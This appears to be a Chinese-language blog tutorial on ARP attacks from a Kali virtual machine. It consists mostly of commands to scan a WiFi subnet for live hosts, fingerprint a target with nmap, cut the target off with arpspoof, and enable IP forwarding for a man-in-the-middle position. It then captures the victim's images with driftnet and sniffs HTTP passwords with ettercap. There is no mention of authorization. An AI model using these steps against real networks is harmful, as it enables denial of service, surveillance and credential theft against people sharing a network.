Kali虚拟机下的arp欺骗

arp攻击

查看本机ip

使用指令ifconfig inet之后的便是IPV4地址

在这里插入图片描述

查一下和自己在同一WiFi下的其他设备

命令: fping -g -r 0 -s 192.168.31.48/24 | grep alive

进行目标IP系统探测(探测是什么系统:电脑or手机)

命令:nmap -T4 -O (目标IP)

arp断网攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1
形式:arpspoof -i eth0(一般虚拟机默认为此) -t 目标IP -r 网关

arp欺骗

查本机ip -------------- ifconfig

查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive

既然是欺骗,那就不能让目标主机断网,所以要更改配置文件

命令:echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

arp攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1

抓图片

driftnet -i eth0

实现密码嗅探

ettercap -Tq -i eth0

注意:图片嗅探会有延迟,没有想象中那么及时。
密码嗅探只能嗅探http的,https不行。
欢迎大家批评指正,本文仅供小白满足好奇心。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值